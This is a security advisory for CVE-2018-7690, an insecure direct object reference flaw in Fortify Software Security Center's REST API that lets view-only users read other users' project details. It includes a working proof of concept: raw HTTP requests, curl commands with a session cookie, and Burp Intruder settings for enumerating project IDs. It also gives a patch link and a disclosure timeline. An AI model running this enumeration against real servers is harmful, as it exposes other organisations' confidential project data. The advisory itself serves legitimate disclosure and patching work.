Details
================
Software: Fortify SSC (Software Security Center) 
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-7690 
CVE: CVE-2018-7690
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639

Description
================
Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's 
Fortify projects via GET method

Vulnerability
================
Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users
to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}

Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. 


Proof of concept
================

Pre-requisites: 

- curl command deployed (Windows or Linux) 
- jq command deployed (for parsing JSON fields), (Windows or Linux) 
- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional) 

Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), 

The URL normally is avaiable as following: 

Target: https://fortifyserver.com/ssc/#/

Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default

Step (4): The offending GET is:


GET /ssc/api/v1/projects/2 HTTP/1.1
Host: fortifyserver.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;


Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: 

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 

-H "Host: fortifyserver.com" 
-H "Connection: close" 
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" 
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
-H "Accept-Encoding: gzip, deflate" 
-H "Accept-Language: en-US,en;q=0.9" 
-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" 
-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" 
--proxy http://127.0.0.1:8080 | jq '.data'

You should see the following response project details: 

{
  "createdBy": "admin",
  "name": "Project Name Here",
  "description": "",
  "id": 2,
  "creationDate": "2012-08-03T09:43:36.000+0000",
  "issueTemplateId": null
}


Step (6): Now extract all the projects details registered into Fortify SSC server: 

Payload:  https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following: 

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 

-H "Host: fortifyserver.com" 
-H "Connection: close" 
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" 
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
-H "Accept-Encoding: gzip, deflate" 
-H "Accept-Language: en-US,en;q=0.9" 
-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" 
-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" 
--proxy http://127.0.0.1:8080 | jq '.data'


You should see other project details available as following: 


{
 "createdBy": "alex",
 "name": "Project Name Here",
 "description": "",
 "id": 5,
 "creationDate": "2012-09-21T09:35:16.000+0000",
 "issueTemplateId": null
}


Step (7): Automate with BurpSuite Pro/Free choose: 


Payload Positions: "Intruder Tab -> Positions" highlight as following:


-> /ssc/api/v1/projects/SS1SS

Payloads set: "Intruder Tab -> Payloads" with the following data:


-> Payload set: 1

-> Payload type: Numbers


Payload Options [Numbers]:


-> Type: Sequential

-> From: 0

-> To: 1500

-> Step: 1


Then start attack...

Have fun! 


Mitigations
================
Install the latest patches availabe here:
https://softwaresupport.softwaregrp.com/doc/KM03298201

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx  (at) protonmail com to acknowledge this report. 

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================

2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found 
2018-05-31: Vendor feedback received 
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-rest fixes on QA environment
2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
2018-11-26: Agreements with the vendor to publish the CVE/Advisory. 
2018-12-12: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db: 
https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576